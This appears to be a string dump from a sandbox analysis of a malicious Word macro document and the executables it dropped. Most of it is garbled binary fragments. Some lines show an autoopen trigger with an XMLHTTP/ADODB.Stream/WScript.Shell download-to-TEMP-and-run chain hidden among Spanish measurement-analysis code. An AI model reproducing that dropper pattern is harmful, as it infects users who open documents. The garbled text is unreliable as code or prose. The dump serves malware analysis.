Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Name="Project"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NewLi ne & @.DescripCriticalERRORResume N

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NH* P!R T V'Jd(* X'Jk* 4 KT 'L KT 'L KT 'Ln) ' H Z | L \ V^`)|X)NP),No se pudo guardar el fichero correctamente. ` H Z ` b!d Z fERROR NORMA$X'8(o((Attribute VB_Name = "Module1"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NN0NHNXNpNNNNNNNNNOOOO O8OPOXO`OhOpOOOOOOO"OOO$OPP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NombreFichero\0Buffer-0Cadena;0i`0Auxu0Fallo,0bHayNORMAZ0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

nstandard

Ansi based on Image Processing (screen_1.png)

nstandard_Farmahar!a9'n

Ansi based on Image Processing (screen_0.png)

ntdll.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

nte."sPathovbOKO nly +Critical, "ERROR PROCESADO DE D%S"!1<ResuNe0xt

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Num_simulac`e1yAo2`@O`n Err`yb{Manip`rbqazrflbYInpf@DoLine #f, #d= ExtraeDatoD.0cha(#Selectse@.oIzqdiCa"", " @q1aVaAsteriscos &X"FICHEROp_MED.L(&s

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

NumSimul6%NO_SIMUL5"Ohres.chk7o.ValueChepckedyA7ay"cai

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

nX!OfficgOficg!G{2DF8D04C-5BFA-101@B-BDE5gAjAe42ggram Files (x86)\@Common\Microsoft Shared\OFFICE11\MSO.DLL#P 11.0 Ob Li`brary'zMSF@Cs>MSFDHs3@eD452EE1-E08F1A-8-02608C4 D0BB4eFMl20L'B @r&/;"1}00}#0#50AAC4BB76D-5A0F-450E-8E46-565CD724AF396Users\1\AppData\Local\Temp\VBE@a5.exdHb: .E

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

o` i r(4)or

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

OfficeDiagnostics Information

Ansi based on Dropped File (369281.od)

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

OLEAUT32.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

OOK.1 p!Jj??6, S;]80cwROU#9eTHETA_SEp?p(1uLPHIND(13P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Operating System

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

oqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvboqugh5ouvb

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.40D000.00000002.mdmp)

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

P cM65?e8optfbHay#s?6p6P#`7}P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

p }t 0ho(UserForm1 q`Z q`ZfW^oXCompObj\aAEH,z*-Microsoft.XMLHTTP/Adodb.Stream/Shell.Application/WScript.Shell/Process/GET/TEMP/Type/Open/write/responseBody/savetofile/

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

P0<INS0+_cz/$(nN_2WU4UU]4oo4venGInnpn .FU(7<nIInt9Zbt/NSF_=&NCAMBI"|2:SIFCO/'i}CRCMPTE-PXY>yAEobFTxHPHo`R<HLEM|EMFORMAT))cSIaB

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

p9() As Variapnt, 36E_10Integer&Stri ng

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

P`pBx8

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Package={AC9F2F90-E877-11CE-9F68-00AA00574A4F}

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

pdh.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

PdhCalculateCounterFromRawValue

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

PdhOpenQueryA

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

perd1:

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

perd4unc@t`E_5/.@4%"\!oma.exe_GuardarF!! "=!PublicA# (NoAs String-Dim f @Integer,!i/b)CPEINI_=mC,TE0xcit9^In Sonda~OuFt!TPo!iRzTN'l FCR.r_cGirar_uTransmp(VTLGoTo 09yyoptSNtDG?uJ=0?QGANT

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

piIncer(N@ombreF

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

PrefCONCAMBIOM0ClaveCONCAMBIO0ClaveCMPTE_U0PrefCPXY|0ClaveCPXYx0PrefAE0ClaveAE_I0PrefTHPH0ClaveTHPH0PrefRHLH0ClaveRHLH.0PrefEMEM0ClaveEMEM>0ClaveFORMATOr

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

PrefFORM_10ClaveFORM_1m0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

PrefFORM_20ClaveFORM_2n0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

PrefFORM_30ClaveFORM_3o0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

PrefFORM_40ClaveFORM_4p0ClaveTHETA_U]0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

PrefSINCAMBIO0ClaveSINCAMBIOWX0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ProductName

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

Project.ThisDocument.autoopenPROJECT.THISDOCUMENT.AUTOOPEN@TM`@UnknownG:AxTimes New Roman5Symbol3&:CxArial"hiAiAnr4C!='3HP)?U2Microsoft OfficeMicrosoft OfficeOh+'0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ProxyEnable

Unicode based on Runtime Data (perdoma.exe )

Public Cargar@|cs(NombreFichero As String Dim fIn`teger@pB`uffer

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Public F:ion AddFieldTo

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Public un

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

putwc

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

Q!HNextoV =Gxu!FySub L(N ombreAero]AmfuBuff@gCadenaGEDiAuxFallBoolean= sebHayS`NIFTD;EXPAN

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Q,Ca(1)62hokuk_S3?E_3R.Environmentf4!Vq2(rTEX8CIT i,$PrefLINX@|c(nQ#ddYoe`afCIR&d"B52

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

qkFSbHLYBVHgM.[~^JL,BMPDocumentautoopen

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

qm,,k,,,,,.

Ansi based on Image Processing (screen_2.png)

QyL-[DRE%PROGRAMFILES%\(x86)\Common Files\Microsoft Shared\OFFICE11\MSO.DLLOffice

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

R0,F.-(3}LFI495GsS4C7#cCPCaA=DaCwaBaTH ETA_CbCN)b7)8PBPHJI910C@ENTRARCentrar_cG12ERDYhGAN3Fs11QBQiqPq8P8r*=B5Wai8P&P80%d1Q,82qqFICHRNF+CHPRB;m"E(rL@INS'9P9!9`Coord9_, rUros99afGIfU)fGiAgub"I.FU(: mNSF_TransaACMPTECmptFORMATO, Forma_

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

R0SF. (3MsSinLe.9s(MLF:I/4$/4)9)5GSonda_GnG6C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

R5I$CN_ s11/&?P

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

rFACTE~XDyRA[l[NICWs(I!r%1P FQRtTFallo7`%Loop Until EOF(flowperd:

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ription

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

rnalName

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

RPuPblic

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

rstdole>stdoleP

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

rU0Y4a[0__SRP_2__SRP_3

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Rucc;cch

Ansi based on Image Processing (screen_4.png)

s4m7aDOUI.FU=3`2On Err@BSManipularbIR] JfPZlApO0pen K2In(putazf@DoALine #8f, c= ExtraeDato.Dcha(c#SelseI.zqdCa"", " SaaVacia

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

s___n__0ut

Ansi based on Image Processing (screen_0.png)

s_ndung_n

Ansi based on Image Processing (screen_0.png)

Sa8lir<Exit Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

SalirGuardar~P Exit Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

SavedLegacySettings

Unicode based on Runtime Data (perdoma.exe )

Schr_ftak

Ansi based on Image Processing (screen_0.png)

schriftak

Ansi based on Image Processing (screen_4.png)

Schriftak

Ansi based on Image Processing (screen_1.png)

ScreenToClient

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

SDuqSgh

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

si_i:1v0n1

Ansi based on Image Processing (screen_4.png)

Si_inl_0ut

Ansi based on Image Processing (screen_1.png)

Sindungin

Ansi based on Image Processing (screen_1.png)

soft Office Diagnostics

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

Software\Microsoft\Office\Common\OffDiag\6bb5dc16-23a7-4e31-8904-aa3fab5a6b6ef3641097-703a-4f59-bd93-c700d9bdfdef

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE1E000.00000004.mdmp)

SONDA A0D4`r_b\~rk7lso= h3oa17

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

SONDA_1aCm2tm3tm4tm5ts?!$!15U!!

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

sProc(6) = frm`esado.optEXPAND.ValuebHayH7chkFresnelIfZChecked ThenA_SFIFT^TbrrElsyFaEnd If~8~CPCz)zCN==9=P==P==10=oord>?U]A_Sub

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ssembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><noInherit></noInherit><assemblyIdentity processorArchitecture="x86" type="win32" name="OffDiag" version="12.0.4518.1014"></assemblyIdentity><description>Office Diagnostics</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.VC80.CRT" version="8.0.50608.0" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity></dependentAssembly></dependency><dependency optional="yes"><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.1.0" publicKeyToken="6595b64144ccf1df" language="*" processorArchitecture="x86"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo></assembly>PA

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

sSF.IFT(5) = SinLe.tras(Case ClaveGSondJa6pExheDat.oIzqda(CadN6)`C

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

sSNIFTD_E.XPAND(16)TPriFIN_CPE, vbN@ewLineFE nd IfIf frmProcesado.chkFresnel.Value = Checked` Then1^Asteriscops &

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

StartUpPosition = 1 'CenterOwner

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

strcat

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

StringFileInfo

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

strtoul

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

t$0%k^

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.401000.00000020.mdmp)

THETA_SE(,A!>vE$2a.to<E]&F[)dPHI(1H-?&/rD.r7"948@!O>|O>l7O>D(1K\]_>f#_>_o>_o>B>TDwP}oB"\-,HVwac!cEj]OOseR K(sSxu.LFIO%a$-$9O+adena)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

THETA_SE(QVA!>9J$R?2d1|_EiPHp8D(1rANBx9RT{!1@!I>ExtraeDat.oIzqda(Cadena)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ThisDocument=200, 200, 1548, 620,

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

ThisDocumentThisDocumentModule1Module1UserForm1UserForm1ID="{7DE7D2EF-3048-46DF-83F3-B33C701AB187}"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Translation

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

TTTTTTTTrTHUPU"XU`UhUpUxUUUUUUUUUUUUUUUUVV(V8VPV`VhVpVxV VWW W] ] ] D0] H] `] x]$]]$]X]p]]]]'<'>'@'B'D'F'H'J'L'NP 8 R T 8+R 8 V+R V+R 8 X V 8 Z,\ 8 T

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

TuTogSBFqD0(5)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

txtLeakage!Z0txtCablesJuntasV0txtCablesJuntasMod0txtNumSimul>0chkJunto0ValueK0GuardarFichProcIncerl0ClaveCPEG0ClaveINI_CPE_z0ClaveFIN_CPE*0TExcitacion0InSonda`0OutSondaQ0TPolariz50TNormalizt0Forma0Centrar_c0CentrarGirar_u0Transf?0Cmpte0Forma_u0optSNIFTD0ClaveSNIFTDa0optEXPANDt0ClaveEXPAND20sSNIFJ0TD_EXPAND0ClaveSONDA_40PrefSONDA_40ClaveSONDA_50PrefSONDA_50sSNIFTf0D_EXPAND0sCNI 0FTG]0IFU0ManipularErrorGuardarProcy0txtDAMAX0lstFrecuencias0ListCount60List*0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

txtNivelRuidod0txtDrift0txtDriftMod>J0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

TypeInfoVer = 1

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

TZtFz

Ansi based on Dropped File (g545[1].exe.177218)

U%'&$]

Ansi based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

u_-_x,x'_-ll'_b-_A-ll__-__--_--_---_=l_l_-_-l

Ansi based on Image Processing (screen_2.png)

u__x,

Ansi based on Image Processing (screen_4.png)

ub_rpr__n

Ansi based on Image Processing (screen_0.png)

uctVersion

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

UIFILE

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

UNCAsIntranet

Unicode based on Runtime Data (perdoma.exe )

unctE_6.Ope8n (0L5)

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctunc2_10ChrK~0Pot_ruido30Drift0DriftMod0LeakageM0CablesJuntas0CablesJuntasModj0Dut0Sgh0Cables0Num_simulaciones\0Junto2<0Junto+0sPathMedida`0sPr0oc10CreateObject0hokuk40Environment50perd20

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_1A0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_2A0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_3A0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_4A0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_5A0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_6A0STILL_ACTIVE0mandatac=0PROCESS_QUERY_INFORMATION=0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_7A0perd30Send0perd40frmAnalisisIncertidumbres0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_8A0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uncunctuncE_9A0uncunctuncE_10Ws0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

USER32.dll

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.410000.00000004.mdmp)

UserForm1=0, 0, 0, 0, C, 175, 175, 1523, 595,

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

uwxz~

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

v_m__c_

Ansi based on Image Processing (screen_0.png)

VarFileInfo

Unicode based on Memory/File Scan (OffDiag.exe , 00371515-00003052.00000001.402296.2FE70000.00000002.mdmp)

vbCritical+}0CargarFichIncer0AddFieldToField0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

vbInformationn0SalirCargarProc50vbNewLine0Erro0Description 0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

VersionCompatible32="393222000"

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Vimiici

Ansi based on Image Processing (screen_1.png)

VS_VERSION_INFO

Unicode based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

VWSVV

Ansi based on Runtime Data (perdoma.exe )

we_i_0

Ansi based on Image Processing (screen_3.png)

wedi_0

Ansi based on Image Processing (screen_4.png)

wwwwwwwwwwwwwwwwwwwww

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

wwwwwwwwwwwwwx

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

Ansi based on Dropped File (g545[1].exe.177218)

X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f%X%f

Ansi based on Dropped File (g545[1].exe.177218)

x'__ll'ib

Ansi based on Image Processing (screen_4.png)

X+002pSQfWordS10VBA0Win160Win320Mac0VBA6#0Project-0stdole`0Normal0Officeu0MSFormsC0ThisDocument<0_Evaluate0autoopen*0CargarFichProc00Module1b0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Xdlt|Microsoft OfficeNormal.dotMicrosoft Office2Microsoft Office Word@F#@`Z@`Z.+,0hp

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Xh$0@Hhx&

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Xh$8H`&

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

xME 8@X`&(Ph&&&8`hx 08&X&&

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

xwxwxx

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

Z%\ %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z%\ Z%\

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z%\ Z%\ Z%\ `k !! ~ ~ ~ ~ `%b `%b `%b `%b `%b `k !! ~ ~

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z%\ Z%\ Z%\ `k8 !! ~ ~ ~ ~ `%b `%b `%b `%b `%b `k7 !! ~ ~

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\ 6 %'6 6 % Z,\ Z%\ % Z,\ KT 6 % KT Z,\ KT Z,\ KT Z,\n 6 % Z,\ K KT KT'F +R KT 6 % `,b `%b % `,b KT 6 % `,b `%b % `,b KT 6 % `,b `%b % `,b KT 6 % `,b `%b % `,b KT 6 % `,b `%b % `,b KT KT'H +R KT 6 % f,b f%b % f,b 6 % f,b f%b % f,b KT 6 % f,b f%b % f,b 6 %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\ 8 ^ V 8 `,b 8 8 d V 8 f,b 8 T f,b 8 h V 8 j,b 8 T j,b T j,b 8 l V 8 n,p 8 T n,p V'v V'x V'z V'| V'~ V' V' V' V' V' T' V'r ' 2 _ 4 4 %'6 4 %K K |KT ~ ~KTFICHERO_MEDKT 6+R

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\ 8 ^ V 8 `,b 8 8 d V 8 f,b 8 T f,b 8 h V 8 j,b 8 T j,b T j,b 8 l V 8 n,p 8 T n,pr ' 2 _ 4 4 t%v'6 4 x%zK K |KT ~ ~KT KT 6+R KT 6 % %$': :

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\d T

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\d T

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Z,\k KT 6 % Z,\ Z%\ % Z,\ 6 %'6 6 % Z,\ Z%\ % Z,\ KT 6 %

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Zs4m7d"(IFUI.<FU=3`2Pot_ruidoLA:DriftModPLeakage0CablesJuntaabm

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Zw__ch'nabla

Ansi based on Image Processing (screen_2.png)

Zw__ch,nabla

Ansi based on Image Processing (screen_0.png)

zwi_chinab_a.

Ansi based on Image Processing (screen_4.png)

Zwi_chinabla.

Ansi based on Image Processing (screen_1.png)

{, xME

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

~ ~ f%b f%b f%b

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

! DRIFT_dB !!dk

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

! DRIFT_GRADOS !!dkH

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

! S/N_LEAKAGE !!dk ! CABLES_JUNTAS_GRADOS !!dk ! CABLES_JUNTAS_dB !!dk8 ! NO_SIMUL !!d `k !! JUNTOS `d JUNTON `k`VX "$. A@0 !! ~ ~ ~ ~ Z%\ Z%\

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

!!!!CN.}(11 hecked+'d IAaUncNO0C:-rJ02oAMBIQ3UNC'CO?WqVrbpTCallBy:N@|(` 1, maPhta(, VbGet`

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

!"#$%&'()*+,-/0123456789:;=>?@ABCDEFGHIJKLMNOPQRSTV[YZ]_`abdfghijklmoV*{~<SbHLYBVHgM.[~^JL,BMPx~^JL,BMPSbHLYBVME(S"SS"6"(1Normal.ThisDocument`

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

!#i0 -!-Step 1b&#Re!CBP`erve#1(i"ag'@ > F1-< "Next >i"&cALoop Until@ EOF(fa"Clo@@@NSalirlW:AxitAu

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

!This program cannot be run in DOS mode.$

Ansi based on Dropped File (g545[1].exe.177218)

" (08@HPX`hpx

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

"No existe el fichero o est? da?ado ` b!d Z fERROR PROCESADO DE DATOS$X'8VA@h ( *B@o]]'r p l l r p$l~& n n n n$t'r p r'ji]8]P]h]]]'<'B'D'F'H'J'L'NPp 8 R T 8+R 8 V+R V+R 8 X V 8 Z,\ 8 T

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

$$$$IQ````ca\a__a...

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

$$$IQ`_``a\a\_SRU]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

$$$IQ````aca_a\]_]>

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

$. $' "$. " A@$= n%p KT ' $KT "' (KT &' ,KT *' 0KT .'n< n%p 6KT 4' :KT 8' >KT <' BKT @'nX<P< ' 2 !!d ` !! 8 !! 8 !% 8 ` !&! ~ ~ ( ~ ~ `k: !*! ~ ~ , ~ ~ `k8: !! ~ ~ ~ ~ Z%\ Z%\

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

$L1&.]

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

$R 'Ld 0'Lk0o0X] 2' 8 !! 8@0 8 !% 8+0 8 !&!+R$R '>dH/'>k8/ !*!+R$R '@d.'@k. !!d+R !!d'4 !!+R !!+R$R'B !!+R$R'D !!+R$R 'Fd.'Fk. !!+R$R 'Hd-'Hk- !!+R$R 'Jdx-'Jkh- !!

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

$R 'Ld(-'Lk-o-]P]h]]]]'<8, ' 2 _, 4 4 %'6 4 % KT 6 % %$': :'N <': @'> 8 : 4 8@0 4 % 8+0 4 % :

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

Ansi based on Dropped File (g545[1].exe.177218)

%WINDIR%\Explorer.EXE

Ansi based on Process Commandline (Explorer.EXE)

%Y5'CIRC2bt)s,_E.)(7Ar

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

&0X`&&(@H`hp&(PX`hx&@HPXpx(0HPXhp&8@&`&& (&Hp& (x0r@H

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

&i = MsgBox ("No pudo ge el f4ero correctamente." & _GosPaBtJeso,OKOnly +Critical, "ERROR PROCESADO DE INCERTIDUM BRES"Resume Next

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

''"S/N_RUIDO"XfrmAnalisisIncertidumbres.txtNivelRuido.0TextvPot_rACDRIFT_GRADOSDriftZBUdBcxModANL@EAKAGELeakageZCABLES_@JUNTASOCablesJunxtas

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

'N 8 : 4 4 % 8 , 8 % % 8 , 8k(P $.$. $.$."$.$.*$.$.$. %.$ KT 6 KT +R KT +R KT +Rn8 KT'B +R$R+R KT'D +R$R+R KT 6 % KT Z,\ KT Z,\ KT Z,\nH 6 % Z,\ KT 6 % Z,\ Z%\0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

'N 8 : 4 8 @ 4 t% 8 , 8 % % 8 , 8k@ KT'> +R KT 6 KT +R KT +R KT +Rn KT KT'@ +R KT KT'B +R$R+R KT'D +R$R+R KT 6 % KT Z,\ KT Z,\ KT Z,\n 6 t%v Z,\ KT 6 % Z,\ Z%\0

Ansi based on Hybrid Analysis (FFGDES34309.doc.bin)

(--------------,-,,.,(

Ansi based on Memory/File Scan (perdoma.exe , 00177718-00001784.00000000.179578.42E000.00000002.mdmp)

(555442424240,,,22111(

